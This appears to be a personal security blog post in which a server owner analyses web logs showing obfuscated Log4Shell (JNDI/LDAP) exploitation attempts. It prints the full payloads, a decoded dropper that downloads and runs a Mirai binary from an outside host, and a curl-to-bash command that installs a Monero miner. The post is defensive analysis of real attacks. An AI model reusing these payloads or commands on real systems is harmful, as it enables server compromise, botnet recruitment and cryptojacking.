By Fred Theilig – @fmtheilig
My IDS alerted me to strange behavior (obfuscated Log4j) on my web server, but rather than investigate through Security Onion, I went straight to the logs. Greping on the offending IP I found the following two entries:
95.214.55.244 - - [03/May/2023:11:41:23 -0400] "GET / HTTP/1.1" 403 17280 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')"
95.214.55.244 - - [03/May/2023:21:34:23 -0400] "GET / HTTP/1.1" 403 17278 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')"
Yea, that’s a mouthful, and very similar to what I reported back in November. Notice each entry has duplicate Base64 code and the second near identical entry came almost ten hours later. We have three IP addresses to look at:
95.214.55.244 – Poland
45.152.113.109 – Japan
129.151.84.124 – Cardiff, Wales (UK)
Nothing to learn there, so let’s decode the same Base64:
wget http://107.172.206.114/.duck/lscpu ;
curl -O http://107.172.206.114/.duck/lscpu ;
chmod +x lscpu ; chmod 777 lscpu ;
./lscpu runner ;
sudo ./lscpu runner ;
rm -rf lscpu
We have another IP to look at, this one housing the final payload:
107.172.206.114 – Los Angeles, CA
Again, we’ve seen this before: Download lscpu, make it executable, run it, delete it. And do everything twice just in case it didn’t work the first time. lscpu is the name of a standard linux command that displays CPU information. It is about 100k on my server while this 32 bit executable is under 19k.
(SHA256: 77e54b206b632f707f03acdce2cae28f539517e50ed9c24755258106ff61c61f)
So, what actually is it? I uploaded it to VirusTotal and it lit up like a house on fire. Mirai, my friend. Ok, let’s delete that sucker.
If you need a refresher (I did), Mirai is software that turns a Linux system into a bot, controlled by some nefarious actor. It first appeared in 2016 infecting Minecraft servers, laying low until the server operator refused to pay protection money. It has since gone open source and variations abound.
Is there anything else to learn from this? The
t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}
nonsense is certainly obfuscated Log4J code that tells the plain text IP addresses to decode and execute the encoded dropper script. It is interesting that the second entry uses a different decoder. But in actuality, I am no smarter than I was last fall. I’d love an explanation how that nosebleed string is actually decoded.
But there is nothing for me to worry about. I don’t use Log4J, I am hyper vigilant with my patching, and my server responded with code 403. Except I got three more log entries on May 5, but with a different payload:
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmGN
This appears to be a Monero crypto miner sending its booty to the 486xqw7 wallet. And my server responded with a 200. That’s not to say that the code was executed. It couldn’t have and there is no trace of c3pool on the server, but it did make me pause.